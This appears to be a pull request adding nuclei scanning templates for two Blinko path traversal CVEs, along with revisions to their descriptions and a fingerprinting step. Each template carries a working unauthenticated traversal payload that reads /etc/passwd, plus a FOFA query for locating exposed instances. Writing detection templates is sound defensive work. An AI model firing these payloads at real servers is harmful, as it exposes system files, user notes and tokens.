### PR TITLE
Add CVE-2026-23482 & CVE-2026-23483 - Blinko Path Traversal

### DIFF
--- a/http/cves/2026/CVE-2026-23482.yaml
+++ b/http/cves/2026/CVE-2026-23482.yaml
@@ -1,0 +1,46 @@
+id: CVE-2026-23482
+
+info:
+  name: Blinko < 1.8.4 - Path Traversal via /api/file/temp
+  author: tx1ee
+  severity: high
+  description: |
+    Blinko is an AI-powered card note-taking project. Prior to version 1.8.4, the file server endpoint does not perform permission checks on the temp/ path and does not filter path traversal sequences, allowing unauthorized attackers to read arbitrary files on the server. When scheduled backup tasks are enabled, attackers can read backup files to obtain all user notes and authentication tokens.
+  impact: |
+    Unauthorized attackers can read arbitrary files from the server, including sensitive backup files containing user notes and authentication tokens.
+  remediation: |
+    Update to Blinko version 1.8.4 or later.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-23482
+    - https://github.com/blinkospace/blinko/security/advisories/GHSA-hrwx-rhrx-f9mm
+    - https://github.com/blinkospace/blinko/commit/c48851090767feba431418630c495d90a7da1781
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2026-23482
+    epss-score: 0.0002
+    epss-percentile: 0.05664
+    cwe-id: CWE-22
+  metadata:
+    verified: true
+    max-request: 1
+    fofa-query: icon_hash="-1446811182" || icon_hash="-717082057"
+    vendor: blinko-space
+    product: blinko
+  tags: cve,cve2026,blinko,blinko-space,lfi,path-traversal,unauth,arbitrary-file-read
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/api/file/temp/..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0:"
+
+      - type: status
+        status:
+          - 200

--- a/http/cves/2026/CVE-2026-23482.yaml
+++ b/http/cves/2026/CVE-2026-23482.yaml
@@ -1,7 +1,7 @@
 id: CVE-2026-23482
 
 info:
-  name: Blinko < 1.8.4 - Path Traversal via /api/file/temp
+  name: Blinko < 1.8.4 - Path Traversal
   author: tx1ee
   severity: high
   description: |
@@ -11,25 +11,40 @@ info:
   remediation: |
     Update to version 1.8.4 or later
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2026-23482
-    - https://github.com/blinkospace/blinko/security/advisories/GHSA-hrwx-rhrx-f9mm
     - https://github.com/blinkospace/blinko/commit/c48851090767feba431418630c495d90a7da1781
+    - https://github.com/blinkospace/blinko/security/advisories/GHSA-hrwx-rhrx-f9mm
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-23482
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2026-23482
+    cwe-id: CWE-22
     epss-score: 0.0002
     epss-percentile: 0.05664
-    cwe-id: CWE-22
   metadata:
     verified: true
     max-request: 1
     vendor: blinko-space
     product: blinko
     fofa-query: icon_hash="-1446811182" || icon_hash="-717082057"
-  tags: cve,cve2026,blinko,blinko-space,lfi,path-traversal,unauth,arbitrary-file-read
+  tags: cve,cve2026,blinko,blinko-space,lfi,traversal
+
+flow: http(1) && http(2)
 
 http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/manifest.webmanifest"
+      - "{{BaseURL}}/manifest.json"
+
+    stop-at-first-match: true
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "Blinko"
+        case-insensitive: true
+
   - method: GET
     path:
       - "{{BaseURL}}/api/file/temp/..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

--- a/http/cves/2026/CVE-2026-23482.yaml
+++ b/http/cves/2026/CVE-2026-23482.yaml
@@ -5,11 +5,11 @@ info:
   author: tx1ee
   severity: high
   description: |
-    Blinko is an AI-powered card note-taking project. Prior to version 1.8.4, the file server endpoint does not perform permission checks on the temp/ path and does not filter path traversal sequences, allowing unauthorized attackers to read arbitrary files on the server. When scheduled backup tasks are enabled, attackers can read backup files to obtain all user notes and authentication tokens.
+    Blinko < 1.8.4 contains a path traversal vulnerability caused by lack of permission checks and filtering on the temp/ path in the file server endpoint, letting unauthorized attackers read arbitrary files including backup files with user notes and tokens, exploit requires no special privileges.
   impact: |
-    Unauthorized attackers can read arbitrary files from the server, including sensitive backup files containing user notes and authentication tokens.
+    Unauthorized attackers can read arbitrary files, including sensitive user notes and tokens, leading to information disclosure.
   remediation: |
-    Update to Blinko version 1.8.4 or later.
+    Update to version 1.8.4 or later
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2026-23482
     - https://github.com/blinkospace/blinko/security/advisories/GHSA-hrwx-rhrx-f9mm
@@ -24,9 +24,9 @@ info:
   metadata:
     verified: true
     max-request: 1
-    fofa-query: icon_hash="-1446811182" || icon_hash="-717082057"
     vendor: blinko-space
     product: blinko
+    fofa-query: icon_hash="-1446811182" || icon_hash="-717082057"
   tags: cve,cve2026,blinko,blinko-space,lfi,path-traversal,unauth,arbitrary-file-read
 
 http:

--- a/http/cves/2026/CVE-2026-23483.yaml
+++ b/http/cves/2026/CVE-2026-23483.yaml
@@ -1,0 +1,45 @@
+id: CVE-2026-23483
+
+info:
+  name: Blinko <= 1.8.3 - Path Traversal via /plugins
+  author: tx1ee
+  severity: medium
+  description: |
+    Blinko is an AI-powered card note-taking project. In versions from 1.8.3 and prior, the plugin file server endpoint uses join() to concatenate paths but does not verify if the final path is within the plugins directory, leading to path traversal.
+  impact: |
+    Unauthorized attackers can read arbitrary files from the server via the plugin file server endpoint.
+  remediation: |
+    Update to the latest version of Blinko.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-23483
+    - https://github.com/blinkospace/blinko/security/advisories/GHSA-54c7-9gxh-fg9v
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+    cvss-score: 5.3
+    cve-id: CVE-2026-23483
+    epss-score: 0.00017
+    epss-percentile: 0.04041
+    cwe-id: CWE-22
+  metadata:
+    verified: true
+    max-request: 1
+    fofa-query: icon_hash="-1446811182" || icon_hash="-717082057"
+    vendor: blinko-space
+    product: blinko
+  tags: cve,cve2026,blinko,blinko-space,lfi,path-traversal,unauth,arbitrary-file-read
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/plugins/..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0:"
+
+      - type: status
+        status:
+          - 200

--- a/http/cves/2026/CVE-2026-23483.yaml
+++ b/http/cves/2026/CVE-2026-23483.yaml
@@ -5,11 +5,11 @@ info:
   author: tx1ee
   severity: medium
   description: |
-    Blinko is an AI-powered card note-taking project. In versions from 1.8.3 and prior, the plugin file server endpoint uses join() to concatenate paths but does not verify if the final path is within the plugins directory, leading to path traversal.
+    Blinko <= 1.8.3 contains a path traversal caused by improper path concatenation without verification in the plugin file server endpoint, letting remote attackers access arbitrary files, exploit requires network access.
   impact: |
-    Unauthorized attackers can read arbitrary files from the server via the plugin file server endpoint.
+    Remote attackers can access arbitrary files outside the intended directory, potentially exposing sensitive data.
   remediation: |
-    Update to the latest version of Blinko.
+    Update to the latest version once available.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2026-23483
     - https://github.com/blinkospace/blinko/security/advisories/GHSA-54c7-9gxh-fg9v
@@ -23,9 +23,9 @@ info:
   metadata:
     verified: true
     max-request: 1
-    fofa-query: icon_hash="-1446811182" || icon_hash="-717082057"
     vendor: blinko-space
     product: blinko
+    fofa-query: icon_hash="-1446811182" || icon_hash="-717082057"
   tags: cve,cve2026,blinko,blinko-space,lfi,path-traversal,unauth,arbitrary-file-read
 
 http:


### PR DESCRIPTION
### Summary

This PR adds two nuclei templates for Blinko path traversal vulnerabilities:

- **CVE-2026-23482**: Unauthenticated arbitrary file read via  endpoint. The file server endpoint does not perform permission checks on the  path and does not filter path traversal sequences.
  - CVSS: 7.5 (High)
  - CWE-22
  - Affected: Blinko < 1.8.4

- **CVE-2026-23483**: Unauthenticated arbitrary file read via  endpoint. The plugin file server endpoint uses  to concatenate paths but does not verify if the final path is within the plugins directory.
  - CVSS: 5.3 (Medium)
  - CWE-22
  - Affected: Blinko <= 1.8.3

### References

- https://nvd.nist.gov/vuln/detail/CVE-2026-23482
- https://github.com/blinkospace/blinko/security/advisories/GHSA-hrwx-rhrx-f9mm
- https://nvd.nist.gov/vuln/detail/CVE-2026-23483
- https://github.com/blinkospace/blinko/security/advisories/GHSA-54c7-9gxh-fg9v

### Verification

Templates were verified against a local Blinko 1.8.3 Docker environment:

Both templates successfully matched.